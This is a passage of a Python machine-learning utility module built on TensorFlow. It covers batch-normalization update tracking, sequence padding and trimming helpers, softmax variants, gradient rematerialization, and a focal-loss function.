batch_norm_stats, batch_norm_var.dtype.base_dtype)) * decay
has_nan_or_inf = tf.reduce_any(
tf.math.logical_or(
tf.math.is_nan(update_delta), tf.math.is_inf(update_delta)))
update_delta = tf.where(has_nan_or_inf, tf.zeros_like(update_delta),
update_delta)
bn_update = tf.assign_sub(batch_norm_var, update_delta, name=scope)
tf.add_to_collection(BATCH_NORM_UPDATES, bn_update)
if not tf.executing_eagerly_outside_functions():
bn_update_dict = _get_batch_norm_updates_dict()
if bn_update.name in bn_update_dict:
raise ValueError(f'BN update {bn_update.name} already exists.')
bn_update_dict[bn_update.name] = (batch_norm_var, batch_norm_stats)
return bn_update
def FindRelevantBatchNormUpdates(loss, batch_norm_updates):
"""Finds and returns a list of relevant batch-normalization updates.
Args:
loss: The loss that is being optimized for. A tensor or a list of tensors.
batch_norm_updates: A list of batch normalization updates.
Returns:
A pair of lists. The first list contains all the batch normalization updates
that are relevant to the loss being optimized, and the second list contains
all in batch_norm_updates but not in the first list.
"""
if tf.executing_eagerly():
return [], []
dependent_ops_and_tensors = set(FindNeeded(loss))
relevant_updates = []
irrelevant_updates = []
bn_update_dict = _get_batch_norm_updates_dict()
for bn_update in batch_norm_updates:
assert bn_update.name in bn_update_dict, (
'%s is probably not a valid batch normalization update op.'
' Make sure batch normalization is done through calling'
' the py_utils.UpdateBatchNormVars helper routine.')
bn_stat_name = bn_update_dict[bn_update.name][1].name
if bn_stat_name in dependent_ops_and_tensors:
# If a batch normalization stat is computed in the forward pass in
# computing loss, then the corresponding batch normalization update is
# relevant. Otherwise, it is not.
relevant_updates.append(bn_update)
else:
irrelevant_updates.append(bn_update)
return relevant_updates, irrelevant_updates
_SAMPLE_STEP_STACK = ThreadLocalStack()
@contextlib.contextmanager
def SampleStep(step):
"""A context for a sample step during decoding.
Example usage::
with py_utils.SampleStep(step):
sample = self.DecodeOneStep()
Args:
step: the step tensor.
Yields:
a context manager for the step scope.
"""
try:
_SAMPLE_STEP_STACK.stack.append(step)
yield step
finally:
_SAMPLE_STEP_STACK.stack.pop()
def _GetSampleStep():
return _SAMPLE_STEP_STACK.stack[-1] if _SAMPLE_STEP_STACK.stack else None
def AddDebugTensor(tensor, summarize=None, name=None):
"""Adds `tensor` to the debug collection.
Prints the tensor if `--print_debug_tensors` is True.
Args:
tensor: A tensor.
summarize: Only print this many entries of each tensor. If None, then a
maximum of 3 elements are printed per input tensor.
name: An optional name for the tensor.
Returns:
A Tensor that evaluates to the same value as the input tensor.
"""
if _FromGlobal('print_debug_tensors'):
step = _GetSampleStep()
tensors_to_print = ([] if step is None else [step]) + [tensor]
with tf.name_scope(name) as s:
tensor = tf.Print(
tensor,
tensors_to_print,
message='DEBUG tensor %s' % s,
name=name,
summarize=summarize)
return tensor
def ArgMax(inputs):
"""tf.argmax wrapper.
Args:
inputs: A tensor, whose last dimension is being reduced on.
Returns:
A tensor of rank tf.rank(logits)-1. If i == ret[indices],
logits[indices, i] is the maximum among logits[indices, :].
"""
if use_tpu():
return tf.argmax(inputs, axis=-1, output_type=tf.int32)
else:
return tf.argmax(inputs, axis=-1)
def _EnsureMatrixShape(x):
if x.shape.ndims is None:
x.set_shape([None, None])
else:
assert x.shape.ndims == 2
return x
def Matmul(x, y, *args, **kwargs):
"""tf.matmul wrapper expecting x and y are actually matrices."""
x = _EnsureMatrixShape(x)
y = _EnsureMatrixShape(y)
return tf.matmul(x, y, *args, **kwargs)
def clip_by_value(t, clip_value_min, clip_value_max, name=None): # pylint: disable=invalid-name
if t.dtype.is_complex:
return tf.complex(
tf.clip_by_value(
tf.math.real(t), clip_value_min, clip_value_max, '%s_real' % name),
tf.clip_by_value(
tf.math.imag(t), clip_value_min, clip_value_max, '%s_imag' % name))
return tf.clip_by_value(t, clip_value_min, clip_value_max, name)
def _TransformAndSum(tensor_list, transform):
with tf.name_scope('TransformAndSum'):
sum_transform = []
for t in tensor_list:
with tf.device(t.device):
if isinstance(t, tf.IndexedSlices):
sum_transform += [tf.reduce_sum(transform(t.values))]
else:
sum_transform += [tf.reduce_sum(transform(t))]
return tf.add_n(sum_transform)
def SumSquared(tensor_list):
return _TransformAndSum(tensor_list, lambda v: tf.abs(v)**2)
def SumAbs(tensor_list):
return _TransformAndSum(tensor_list, tf.abs)
def ReduceRms(x: tf.Tensor) -> tf.Tensor:
"""Computes root mean square of tensor x with numerical stability."""
if not x.shape.is_fully_defined():
raise ValueError('Shape of x must be fully defined.')
if not x.shape.as_list():
return x
denom = functools.reduce((lambda x, y: x * y), x.shape.as_list())
if denom <= 1e8:
return tf.math.sqrt(tf.math.reduce_mean(tf.math.square(x)))
tf.logging.info('reduce_rms %s denom=%d', x, denom)
sum_square_x = tf.math.reduce_sum(tf.math.reduce_sum(tf.math.square(x), -1))
avg_square_x = sum_square_x / tf.constant(denom, dtype=sum_square_x.dtype)
return tf.math.sqrt(avg_square_x)
def PiecewiseConstant(x_in, boundaries, values, vdtype):
"""Returns the piecewise value of x_in."""
x_in = tf.cast(tf.convert_to_tensor(x_in), tf.float32)
assert len(values) == len(boundaries) + 1
assert sorted(boundaries) == list(boundaries)
bs = tf.convert_to_tensor(boundaries, dtype=tf.float32)
vs = tf.convert_to_tensor(values, dtype=vdtype)
# The following is equivalent to 'return vs[index]'.
index = tf.reduce_sum(tf.cast(tf.greater_equal(x_in, bs), tf.int32))
one_hot_vec = tf.one_hot(
tf.expand_dims(index, 0), depth=len(values), dtype=vdtype)
return Matmul(tf.reshape(vs, (1, -1)), tf.transpose(one_hot_vec))[0][0]
def PadSequenceDimension(x, length, pad_val, shape=None, axis=1):
"""Pads x to `length` using `pad_val` along the axis dim.
Assumes `x` is a tensor with rank >= 2, and it only pads `x` to `length`
along the axis dim. Explicitly sets the returned tensor shape to `shape` if
given. Raises runtime errors if x.shape[axis] > length or
x.shape[i] != shape[i] where i != axis.
Args:
x: the tensor to be padded with axis dimension being the time. E.g., x
usually has shape [batch, seq_len, ...], when axis=1.
length: an int to specify the length to pad x to.
pad_val: an int or float used to pad x.
shape: an int array specifying the shape of the padded tensor if specified.
axis: The dimension that x will be padded, default to 1.
Returns:
The padded tensor with shape [batch, seq_len, ...], where
ret[:, :seq_len, ...] == x, when axis=1, and similarly for other axes.
"""
if x.shape.ndims is not None:
rank = x.shape.ndims
assert rank >= 2
slen = GetShape(x, rank)[axis]
pad_len = length - slen
pad = [[0, 0] for _ in range(rank)]
pad[axis][1] = pad_len
else:
rank = tf.rank(x)
with tf.control_dependencies([assert_greater_equal(rank, 2)]):
slen = tf.shape(x)[axis]
pad_len = length - slen
pad = tf.scatter_nd([[axis, 1]], [pad_len], [rank, 2])
x = tf.pad(x, pad, constant_values=pad_val)
if x.shape.ndims is not None and isinstance(length, int):
static_shape = x.shape.as_list()
static_shape[axis] = length
x.set_shape(static_shape)
if shape:
if not isinstance(shape, (list, tuple)):
raise TypeError('Shape must be a list or tuple.')
x = HasRank(x, len(shape))
x = tf.ensure_shape(x, shape)
return x
def PadSequenceTo(xs, padding, length, pad_val):
"""Pads `xs` and `padding` to `length` using `pad_val` along the 2nd dim.
Pads `xs` to `length` using `pad_val`, and `padding` using 1.
Raise error if `x.shape[:2]` and `padding.shape` are not the same.
Args:
xs: A Tensor or a list of Tensors of shape [batch, seqlen] or [batch,
seqlen, ...].
padding: A 0/1 Tensor of shape [batch, seqlen]. 1 is for padded locations.
length: A Python int, the length to pad to.
pad_val: A Python numeric, used for padding x.
Returns:
A tuple of padded xs and padding.
"""
if not isinstance(xs, (list, tuple)):
new_xs = [xs]
else:
new_xs = xs
res = []
for x in new_xs:
batch, slen = GetShape(x, 2)
padding = HasRank(padding, 2)
padding = HasShape(padding, [batch, slen])
new_x = PadSequenceDimension(x, length, pad_val)
res.append(new_x)
padding = PadSequenceDimension(padding, length, tf.cast(1, padding.dtype))
if not isinstance(xs, (list, tuple)):
assert len(res) == 1
return res[0], padding
else:
return tuple(res), padding
def ApplyPadding(padding, x, padded=None, broadcast=True, use_select=True):
"""Applies padding to a tensor.
This is preferable to using arithmetic means for masking out padded values
such as::
# Equiv to ApplyPadding(padding, x))
x *= 1.0 - padding
# Equiv to ApplyPadding(padding, new, old)
new = old * padding + new * (1 - padding)
Aside from just being easier to read and reason about, using this function
is friendly to quantized representations because it does not mix arithmetic
on the padding values with the values in the tensor being padded (which can
have a very different range than the 0..1 padding tensor).
In addition, this works around issues in quantized schemes where we are
guaranteed to have an exact 0 but not necessarily any other number (i.e. 1).
Args:
padding: Tensor of padding values where 0 == keep and 1 == pad.
x: Tensor to apply padding to.
padded: Optional. Values to include for padded elements. Defaults to zeros.
Must be the same shape as 'x' if specified.
broadcast: Whether to broadcast the padding shape to the shape of 'x'. You
almost certainly want this to be true as it matches how padding would be
expanded if applied arithmetically.
use_select: Controls whether padding is applied with a select-mask
(True/default) or arithmetically (False). Some platforms have a
sensitivity to one or the other and this is used to work around such
issues.
Returns:
A tensor with the same shape as x with padded values masked.
"""
padding = with_dependencies([
Assert(
tf.reduce_all(
tf.math.logical_or(
tf.equal(padding, 0.0), tf.equal(padding, 1.0))), [padding])
], padding)
if use_select:
if padded is None:
padded = tf.zeros_like(x)
if broadcast:
# Broadcast padding to the full shape.
padding = tf.cast(padding, x.dtype) * tf.ones_like(x)
return tf.where(padding > tf.zeros_like(padding), padded, x)
else:
result = x * tf.cast(1.0 - padding, x.dtype)
if padded is not None:
result += padded * tf.cast(padding, padded.dtype)
return result
def LengthsFromPaddings(paddings):
"""Computes lengths of each sequence in a batch, ignoring trailing padding.
Note the following isn't guaranteed due to leading paddings.
PaddingsFromLengths(LengthsFromPaddings(x)) == x
Args:
paddings: a tensor with shape [batch, length].
Returns:
lengths tensor shaped [batch] containing the unpadded length of each
sequence in the batch.
"""
paddings = HasRank(paddings, 2)
paddings = tf.cast(paddings, tf.int32)
# Find the last unpadded value.
# Cannot just use tf.reduce_sum because there might be leading paddings.
# Everything after the last unpadded value has 1.0 - paddings == 0.0, so in
# the cumsum below they will have the same value.
cumsum = tf.cumsum(1 - paddings, axis=1)
same_as_last_element = tf.equal(cumsum, cumsum[:, -1:])
# Counting the number of elements with the same value gives us num_padded + 1
# and so counting the number that differs gives us num_padded - 1.
length = tf.reduce_sum(
1 - tf.cast(same_as_last_element, tf.int32), axis=1) + 1
# Special case for all 0 paddings.
all_zero_paddings = tf.equal(tf.reduce_sum(1 - paddings, axis=1), 0)
return tf.where(all_zero_paddings, tf.zeros_like(length), length)
def PaddingsFromLengths(lengths, maxlen=None):
"""Computes paddings Tensor from lengths.
Note the following isn't guaranteed due to leading paddings.
PaddingsFromLengths(LengthsFromPaddings(x)) == x.
This method does not generate leading paddings.
Args:
lengths: A int32 Tensor of shape [B].
maxlen: None or a Python int or a scalar Tensor.
Returns:
A 0/1 valued Tensor of shape [B, maxlen or ?] where 1s are padded positions.
"""
lengths = HasRank(lengths, 1)
if maxlen is not None:
lengths = with_dependencies(
[assert_less_equal(tf.cast(tf.reduce_max(lengths), tf.int32), maxlen)],
lengths)
return 1. - tf.sequence_mask(lengths, maxlen=maxlen, dtype=tf.float32)
def TrimTrailingPaddings(inputs, paddings):
"""Trims trailing paddings from inputs.
Since the number of dimensions is not fixed, this will not work on TPU.
Args:
inputs: a tensor with shape [batch, length, ...].
paddings: a tensor with shape [batch, length].
Returns:
Trimmed inputs and paddings. For compatibility reasons, the trimmed tensors
will always have length at least 1.
"""
paddings = HasRank(paddings, 2)
max_length = tf.maximum(tf.reduce_max(LengthsFromPaddings(paddings)), 1)
output_shape = tf.shape(inputs)
output_shape = tf.concat([[output_shape[0], max_length], output_shape[2:]],
axis=0)
outputs = tf.slice(inputs, tf.zeros_like(output_shape), output_shape)
out_paddings = tf.slice(paddings, [0, 0],
tf.stack([output_shape[0], max_length]))
return outputs, out_paddings
def ReversePaddedSequence(inputs, paddings):
"""Reverse inputs based on paddings.
Only reverse the unpadded portion of `inputs`. It assumes inputs are only
padded in the end.
Args:
inputs: a tensor of [seq_length, batch_size, num_input_nodes].
paddings: a tensor of float32/float64 zero or one of shape [seq_length,
batch_size, 1].
Returns:
A reversed tensor of the same shape as `inputs`.
"""
inversed_paddings = 1.0 - tf.squeeze(paddings, 2)
inputs_length = tf.cast(
tf.math.rint(tf.reduce_sum(inversed_paddings, axis=0)), tf.int32)
return tf.reverse_sequence(inputs, inputs_length, seq_axis=0, batch_axis=1)
def ConcatenatePaddedSequences(input0, input1, padding0, padding1, seq_dim=1):
"""Concatenates input sequences with varying lengths as defined by paddings.
This is a helper function for concatenating 2 batches of input sequences,
where each example in the batch can have different lengths, as defined by
the corresponding paddings. To concatenate correctly, it makes use of
tf.reverse_sequence to partially reverse the sequences before
concatenating them together.
NOTE: We assume that the tensors have no leading paddings.
Args:
input0: A tensor of size [batch, max_length, ...] or [max_length, batch,
...] depending on the value set for axis.
input1: A tensor of size [batch, max_length, ...] or [max_length, batch,
...] depending on the value set for axis.
padding0: A Tensor of size [batch, max_length] or [max_length, batch]
corresponding to the padding for input0.
padding1: A Tensor of size [batch, max_length] or [max_length, batch]
corresponding to the padding for input1.
seq_dim: int, the time axis along which the tensors will be concatenated.
Should be 0 or 1. Assumes that batch_dim is 1 - seq_dim.
Returns:
The concatenation of input0 and input1, and the corresponding padding.
Raises:
tf.errors.InvalidArgumentError when seq_dim is not 0 or 1.
"""
if seq_dim != 0 and seq_dim != 1:
raise tf.errors.InvalidArgumentError(None, None, 'seq_dim must be 0 or 1.')
batch_dim = 1 - seq_dim
# inpu0 and input1 should have the same batch size and same rank.
input0 = with_dependencies([
assert_equal(GetShape(input0)[batch_dim],
GetShape(input1)[batch_dim]),
assert_equal(GetRank(input0), GetRank(input1))
], input0)
batch_size = GetShape(padding0)[batch_dim]
# batch dimension of inputs and paddings should match.
input0 = with_dependencies([
assert_equal(GetShape(input0)[batch_dim], batch_size),
assert_equal(GetShape(padding1)[batch_dim], batch_size)
], input0)
input0_seq_dim = tf.cast(
tf.tile([tf.shape(padding0)[seq_dim]], [batch_size]), dtype=tf.int32)
input1_seq_dim = tf.cast(
tf.tile([tf.shape(padding1)[seq_dim]], [batch_size]), dtype=tf.int32)
# LengthsFromPaddings assumes that paddings is of size [batch, max_length].
if seq_dim == 1:
seq_length0 = LengthsFromPaddings(padding0)
seq_length1 = LengthsFromPaddings(padding1)
else:
seq_length0 = LengthsFromPaddings(tf.transpose(padding0))
seq_length1 = LengthsFromPaddings(tf.transpose(padding1))
# We assume that the tensors have no leading paddings.
# TODO(arunnt): Concatenate tensors with leading paddings correctly.
seq_length0 = with_dependencies([
assert_equal(
seq_length0,
tf.cast(tf.reduce_sum(1.0 - padding0, seq_dim), dtype=tf.int32))
], seq_length0)
seq_length1 = with_dependencies([
assert_equal(
seq_length1,
tf.cast(tf.reduce_sum(1.0 - padding1, seq_dim), dtype=tf.int32))
], seq_length1)
# Concatenate input sequences.
reversed_input0 = tf.reverse_sequence(
input0, seq_length0, seq_axis=seq_dim, batch_axis=batch_dim)
reversed_input1 = tf.reverse_sequence(
input1, input1_seq_dim, seq_axis=seq_dim, batch_axis=batch_dim)
reversed_concat = tf.concat([reversed_input1, reversed_input0], axis=seq_dim)
concat_inputs = tf.reverse_sequence(
reversed_concat,
seq_length0 + input1_seq_dim,
seq_axis=seq_dim,
batch_axis=batch_dim)
# Concatenate paddings. Note that paddings are always a Tensor of 0s and 1s,
# so, unlike the inputs, we don't have to reverse padding1, we can simply
# concatenate reversed padding0 and padding1.
reversed_padding0 = tf.reverse_sequence(
padding0, input0_seq_dim, seq_axis=seq_dim, batch_axis=batch_dim)
reversed_concat_padding = tf.concat([reversed_padding0, padding1],
axis=seq_dim)
concat_paddings = tf.reverse_sequence(
reversed_concat_padding,
input0_seq_dim + seq_length1,
seq_axis=seq_dim,
batch_axis=batch_dim)
return concat_inputs, concat_paddings
def ShiftLeft(tensor, shift_size, pad_val=0, axis=1):
"""Shifts the values in a tensor to the left along the axis dimension.
The first shift_size values are dropped, and the tensor is padded on the
right with pad_val.
Args:
tensor: the input tensor with the axis dim being time.
shift_size: the number of frames >= 0 to shift.
pad_val: the value to pad on the right of the tensor.
axis: The dimension along which the tensor will be shifted, default to 1.
Returns:
A left shifted tensor on dimension axis.
"""
rank = tensor.shape.rank
with tf.control_dependencies(
[assert_greater_equal(rank, 2),
assert_greater_equal(shift_size, 0)]):
time = GetShape(tensor)[axis]
begin = tf.scatter_nd([[axis]], [shift_size], [rank])
return PadSequenceDimension(
tf.slice(tensor, begin, size=[-1] * rank), time, pad_val, axis=axis)
def Retry(*args, **kwargs):
return retry.Retry(*args, **kwargs)
# FailedPreconditionError: variables are not initialized.
# AbortedError: processes restarts.
# UnavailableError: Bad hardware status: 0x1
transient_tf_errors = (tf.errors.FailedPreconditionError,
tf.errors.AbortedError, tf.errors.UnavailableError)
def RetryOnTransientTfError(*args, **kwargs):
return Retry(transient_tf_errors, *args, **kwargs)
def PadOrTrimTo(x, shape, pad_val=0, pad_after_contents=True):
"""Pad and slice x to the given shape.
Args:
x: A tensor.
shape: The shape of the returned tensor.
pad_val: An int or float used to pad x.
pad_after_contents: Whether to pad and trim after the original contents of
each dimension.
Returns:
'x' is padded with pad_val and sliced so that the result has the given
shape.
Raises:
ValueError: if shape is a tf.TensorShape and not fully defined.
"""
if isinstance(shape, (list, tuple)):
expected_rank = len(shape)
elif isinstance(shape, tf.TensorShape):
if not shape.is_fully_defined():
raise ValueError('shape %s padding %s must be fully defined.' %
(shape, x))
expected_rank = shape.rank
else:
shape = HasRank(shape, 1)
expected_rank = tf.size(shape)
x = HasRank(x, expected_rank)
pad = shape - tf.minimum(tf.shape(x), shape)
zeros = tf.zeros_like(pad)
if pad_after_contents:
# If dim_i is less than shape[i], pads after contents.
paddings = tf.stack([zeros, pad], axis=1)
# If dim_i is larger than shape[i], we slice [0:shape[i]] for dim_i.
slice_begin = zeros
else:
# If dim_i is less than shape[i], pads before contents.
paddings = tf.stack([pad, zeros], axis=1)
# If dim-i is larger than shape[i], we slice [dim_i - shape[i]:dim_i]
# for dim_i.
slice_begin = tf.shape(x) + pad - shape
x = tf.pad(x, paddings, constant_values=pad_val)
x = tf.slice(x, slice_begin, shape)
return tf.reshape(x, shape)
def RepeatDim(tensor, multiple, axis):
"""Copies elements in tensor's axis "multiple" times, like np.repeat."""
# x = [[1, 2, 3], [4, 5, 6]]
# RepeatDim(x, multiple=2, axis=1) gives:
# [[1, 1, 2, 2, 3, 3]. [4, 4, 5, 5, 6, 6]]
# As a comparison tf.tile(x, multiples=[1, 2]) gives:\
# [[1, 2, 3, 1, 2, 3], [4, 5, 6, 4, 5, 6]]
if multiple == 1:
return tensor
t_shape = tf.shape(tensor)
tensor_dims = tf.concat(
[t_shape[:axis], [t_shape[axis] * multiple], t_shape[axis + 1:]], 0)
multiple_dims = tf.concat([
tf.fill([axis + 1], 1), [multiple],
tf.fill([tf.rank(tensor) - axis - 1], 1)
], 0)
return tf.reshape(
tf.tile(tf.expand_dims(tensor, axis + 1), multiple_dims), tensor_dims)
def StackTensorsRecursively(values):
"""Recursively stacks Tensors in a list of `.NestedMap`.
Args:
values: a list of `.NestedMap` or Tensors to stacks.
Returns:
A `.NestedMap` with stacked values or a stacked Tensor.
"""
flatten = [w.Flatten() for w in values]
stacked = []
for i in range(len(flatten[0])):
stacked += [tf.stack([flatten[j][i] for j in range(len(flatten))])]
ret = values[0].Pack(stacked)
return ret
def MixByWeight(inputs, weights, seed=None):
"""Returns a weighted random choice and bprop type from the give inputs.
Args:
inputs: a list of callables, where each callable returns a tf.Tensor or a
nested structure containing tf.Tensor. Function return types must be
consistent across elements. The tf.Operation to compute the result tensor
will only be invoked for one input at a time. For example, if each fn
represents an input record stream, a record will be drawn only from a
selected stream while the other streams will remain unchanged.
weights: a 1D tensor of float > 0 of the same length as inputs.
seed: random seed.
Returns:
A probablistic sample from the inputs proportional to the weights. The
return type will be the same as return type of individual 'fn' from the
inputs.
A one-hot vector of the source selected.
"""
weights = tf.convert_to_tensor(weights, dtype=tf.float32)
weights = with_dependencies([
assert_equal(tf.shape(weights), [len(inputs)]),
assert_greater_equal(tf.reduce_min(weights), 0.0)
], weights)
lower = tf.cumsum(weights, exclusive=True)
upper = tf.cumsum(weights, exclusive=False)
r = tf.random.uniform(shape=[], maxval=upper[-1], seed=seed)
return_input = tf.case(
[(tf.math.logical_and(lower[i] <= r, r < upper[i]), inputs[i])
for i in range(len(inputs))],
exclusive=True)
selected_index = tf.case(
[(tf.math.logical_and(lower[i] <= r, r < upper[i]), lambda i=i: i)
for i in range(len(inputs))],
exclusive=True)
bprop_index = tf.one_hot(selected_index, len(inputs), dtype=tf.float32)
return return_input, bprop_index
def CheckShapes(shapes):
"""Asserts that shapes is a tuple of NestedMap or tshape.Shape."""
assert isinstance(shapes, tuple), str(shapes)
for s in shapes:
if isinstance(s, NestedMap):
assert all([isinstance(t, tshape.Shape) for t in Flatten(s)
]), '{} contains non-tensor value.'.format(s)
else:
assert isinstance(s, tshape.Shape), '{}: {}'.format(type(s), s)
def FPropDtype(params):
return params.fprop_dtype if params.fprop_dtype is not None else params.dtype
def UpdateFpropDtype(params, fprop_dtype):
"""Recursively update the fprop_dtype of the Params."""
# Handle the case when the input "params" is not an instance of hyperparams
# For example, when UpdateDtype is called recursively for all the items in
# the "sub" list of SequentialLayer (see 1st elif below)
if not isinstance(params, hyperparams.Params):
return
for key, val in params.IterParams():
if isinstance(val, hyperparams.Params):
UpdateFpropDtype(val, fprop_dtype)
elif isinstance(val, (list, tuple)):
for item in val:
UpdateFpropDtype(item, fprop_dtype)
elif key == 'fprop_dtype':
params.fprop_dtype = fprop_dtype
def UpdateDtype(params, dtype):
"""Recursively update the dtype of the Params."""
# Handle the case when the input "params" is not an instance of hyperparams
# For example, when UpdateDtype is called recursively for all the items in
# the "sub" list of SequentialLayer (see 1st elif below)
if not isinstance(params, hyperparams.Params):
return
for key, val in params.IterParams():
if isinstance(val, hyperparams.Params):
UpdateDtype(val, dtype)
elif isinstance(val, (list, tuple)):
for item in val:
UpdateDtype(item, dtype)
elif key == 'dtype':
params.dtype = dtype
def NameScopeDecorator(name_scope):
"""Decorates a python function to introduce a tf.name_scope.
Example::
@py_utils.NameScopeDecorator('foobar')
def MyFoobarMethod(self):
# ... Do TF things
Args:
name_scope: The name scope to introduce.
Returns:
A function decorator.
"""
def Decorator(f):
def Wrapped(*args, **kwargs):
with tf.name_scope(name_scope):
return f(*args, **kwargs)
return Wrapped
return Decorator
def SequencesToDebugStrings(ids, lens, summarize=5):
"""Returns debug strings for the given sequences.
Args:
ids: int32 of [batch, len].
lens: int32 of [batch].
summarize: number of ids to summarize per sequence.
Returns:
A string tensor of [batch].
"""
num_seqs = tf.shape(lens)[0]
def _Body(i, result):
line = tf.strings.format('{}', ids[i, :lens[i]], summarize=summarize)
return i + 1, tf.concat([result, tf.reshape(line, [1])], axis=0)
i0 = tf.zeros(shape=[], dtype=tf.int32)
result0 = tf.constant('', shape=[0], dtype=tf.string)
_, strs = tf.while_loop(
lambda i, result: i < num_seqs,
_Body, (i0, result0),
shape_invariants=(i0.shape, tf.TensorShape([None])))
return strs
# TODO(jamesqin): follow suggestions in
# b/167460492#comment16
def RematerializeFn(fn, *xs):
"""Calls fn and rematerializes fn in the backward pass.
`fn(*xs) -> ys`, where xs and ys can be a single tensor or a tuple of tensors.
Args:
fn: A python function to be rematerialized in the backprop pass.
*xs: A single tensor or a list/tuple of tensors. `xs` are input args to the
fn function.
Returns:
`fn(*xs)`
"""
initial_step_seed = GetStepSeed()
final_step_seed = MaybeGenerateSeedFromScope()
def Backward(fwd_xs, fwd_ys, d_fwd_ys):
"""The backward function that rematerializes forward outputs."""
del fwd_ys
always_true = tf.random.uniform([]) < 2.0
# Alternatively, can do this:
# tf.where(tf.math.is_nan(x),
# tf.constant(float('nan'), dtype=x.dtype) * tf.ones_like(x),
# x)
bak_xs = [tf.where(always_true, x, tf.zeros_like(x)) for x in fwd_xs.xs]
for dst, src in zip(bak_xs, xs):
dst.set_shape(src.shape)
ResetStepSeed(initial_step_seed)
ys = fn(*bak_xs)
MaybeResetStepSeed(final_step_seed)
dxs = tf.gradients(ys, bak_xs, grad_ys=d_fwd_ys)
dxs_final = []
for dx, x in zip(dxs, bak_xs):
if dx is None:
dxs_final.append(tf.zeros_like(x))
else:
dxs_final.append(dx)
assert len(dxs_final) == len(bak_xs)
return NestedMap(
initial_step_seed=tf.zeros_like(initial_step_seed), xs=dxs_final)
ys_shapes = []
# TODO(huangyp, yonghui): Check Forward doesn't use any stateful random ops.
def Forward(fwd_xs):
"""Forward function plus sanity checks."""
for dst, src in zip(fwd_xs.xs, xs):
dst.set_shape(src.shape)
ResetStepSeed(fwd_xs.initial_step_seed)
ys = fn(*fwd_xs.xs)
# Some sanity check.
assert not GetExtraInputs()
assert not GetExtraArgs()
assert not GetExtraVars()
if isinstance(ys, tuple):
for y in ys:
assert isinstance(y, tf.Tensor)
ys_shapes.append(y.shape)
else:
assert isinstance(ys, tf.Tensor)
ys_shapes.append(ys.shape)
return ys
ys = CallDefun(
Forward,
NestedMap(initial_step_seed=initial_step_seed, xs=xs),
bak=Backward)
if isinstance(ys, tuple):
for y, s in zip(ys, ys_shapes):
y.set_shape(s)
else:
ys.set_shape(ys_shapes[0])
# TODO(b/129159299): The ResetStepSeed below is needed to work around this
# bug, which is a problem with global tensors being shared by different
# inference graphs. It should be replaced with the new step seed value
# returned from the Forward function when the bug is fixed.
MaybeResetStepSeed(final_step_seed)
return ys
# A set of names of stateful random number generator ops.
# See tensorflow/core/ops/random_ops.cc
_STATEFUL_RANDOM_OPS = frozenset({
# pyformat: disable
'RandomUniform',
'RandomUniformInt',
'RandomStandardNormal',
'ParameterizedTruncatedNormal',
'TruncatedNormal',
'RandomShuffle',
'Multinomial',
'RandomGamma',
'RandomPoisson',
'RandomPoissonV2',
# pyformat: enable
})
def StatefulRandomOpsInDefun(func, graph=None):
"""Checks whether the Defun depends on stateful random number ops.
Stateful random number generator ops should be avoid in Recurrent() call.
Otherwise, these ops produce inconsistent values between FProp and BProp.
Args:
func: a _DefinedFunction or ConcreteFunction to check.
graph: a Graph. Set None to use the default graph.
Returns:
A list of names of the stateful random ops.
Raises:
InvalidArgumentError: if the input func/graph is invalid.
"""
if graph is None:
graph = tf.get_default_graph()
func.add_to_graph(graph)
graph_def = graph.as_graph_def()
# A dict from function name to FunctionDef.
func_defs = {x.signature.name: x for x in graph_def.library.function}
if isinstance(func, function._DefinedFunction): # pylint: disable=protected-access
if func.definition.signature.name not in func_defs:
raise tf.errors.InvalidArgumentError(
None, None, 'Defun {} is not in the graph .'.format(
func.definition.signature.name))
nodes = py_collections.deque(func.definition.node_def)
else:
nodes = py_collections.deque(func.function_def.node_def)
stateful_ops = []
# Recursively search for stateful random op.
while nodes:
node = nodes.pop()
assert isinstance(node, node_def_pb2.NodeDef), node
if node.op in _STATEFUL_RANDOM_OPS:
stateful_ops.append(node.name)
continue
def _AddDefunNodes(func_name):
"""If the given func_name is a Defun, add its sub-nodes into nodes."""
if func_name in func_defs:
nodes.extend(func_defs[func_name].node_def)
# For functional.{While|For|If} ops, add their Defun attr into search.
if node.op == 'While':
_AddDefunNodes(node.attr['body'].func.name)
_AddDefunNodes(node.attr['cond'].func.name)
elif node.op == 'For':
_AddDefunNodes(node.attr['body'].func.name)
elif node.op == 'If':
_AddDefunNodes(node.attr['then_branch'].func.name)
_AddDefunNodes(node.attr['else_branch'].func.name)
elif node.op == 'StatefulPartitionedCall':
_AddDefunNodes(node.attr['f'].func.name)
elif node.op != 'PartitionedCall':
# For other op, check whether itself is a Defun op.
_AddDefunNodes(node.op)
return stateful_ops
def ToPlaceholders(nmap, dtype=None):
"""Converts every Tensor in nmap to a placeholder."""
def _ToPlacerholder(x):
shape = [None for _ in x.shape[:-1]] + [x.shape[-1]]
return tf.placeholder(dtype=dtype or x.dtype, shape=shape)
return nmap.Transform(_ToPlacerholder)
def Softmax(logits, axis=None, extra_logit=None, name=None):
"""Softmax with extra_logits, might be useful for large xformer LM."""
if extra_logit is None:
return tf.nn.softmax(logits, axis=axis, name=name)
axis = -1 if axis is None else axis
def ReduceLogSumExp(x):
max_logit = tf.math.reduce_max(
tf.stop_gradient(x), axis=axis, keepdims=True)
base_logit = tf.math.maximum(max_logit, extra_logit)
x -= base_logit
exp_x = tf.math.exp(x)
sum_exp_x = tf.math.reduce_sum(exp_x, axis=axis, keepdims=True)
sum_exp_x += tf.math.exp(extra_logit - base_logit)
return tf.math.log(sum_exp_x) + base_logit
def LogSoftmax(x):
return x - ReduceLogSumExp(x)
with tf.name_scope(name):
return tf.math.exp(LogSoftmax(logits))
def SoftmaxCrossEntropyFocalLoss(logits,
label_ids=None,
label_probs=None,
alpha=None,
gamma=None,
stop_gradient_on_focal_loss_coefficient=False):
u"""Focal loss for multinomial (softmax) logistic loss.
[1] Focal loss https://arxiv.org/abs/1708.02002
Args:
logits: [..., C]. Logits for the multinomial logistic regression. C is the
number of classes.
label_ids: [...]. Each entry in labels must be an index in [0, C).
label_probs: [..., C]. Each vector along last dimension must be a valid
probability distribution.
alpha: [C]. The weighting factor alpha. Eq (3) in [1].
gamma: []. Tunable focusing parameter. Eq (4) in [1].
stop_gradient_on_focal_loss_coefficient: If true, stops gradient on the
focal loss coefficient (1-p)^gamma to stabilize the gradient.
Returns:
loss[i..., j] = FL(pₜ) = - αₜ(1-pₜ)ˠlog(pₜ) Eq (5) in [1].
"""
def _ApplyFocalLossCoefficient(loss, log_probs):
if gamma is not None and gamma != 0:
probs = tf.exp(log_probs)
coefficient = tf.pow(1.0 - probs, gamma)
if stop_gradient_on_focal_loss_coefficient:
coefficient = tf.stop_gradient(coefficient)
loss *= coefficient
